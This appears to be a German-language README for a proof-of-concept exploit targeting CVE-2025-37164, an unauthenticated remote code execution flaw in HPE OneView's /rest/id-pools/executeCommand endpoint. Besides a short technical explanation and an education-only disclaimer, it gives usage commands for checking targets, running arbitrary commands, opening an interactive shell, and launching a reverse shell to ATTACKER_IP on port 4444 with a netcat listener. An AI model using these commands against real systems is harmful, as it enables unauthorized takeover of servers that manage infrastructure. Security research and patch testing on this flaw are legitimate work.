
Proof-of-Concept-Exploit für CVE-2025-37164, eine kritische nicht authentifizierte Remote-Codeausführungsschwachstelle in HPE OneView über den Endpunkt /rest/id-pools/executeCommand.
Proof-of-Concept-Exploit für CVE-2025-37164, eine kritische (CVSS 10.0) unauthentifizierte Remote-Codeausführungsschwachstelle in HPE OneView.
DIESE SOFTWARE WIRD NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS BEREITGESTELLT.
Technische Analyse: Die Schwachstelle existiert im PUT /rest/id-pools/executeCommand-Endpunkt, der keine Authentifizierung erfordert und benutzergesteuerte Eingaben direkt an Runtime.exec() übergibt.
requests-Bibliothek (pip install requests)# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check
# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"
# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i
# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444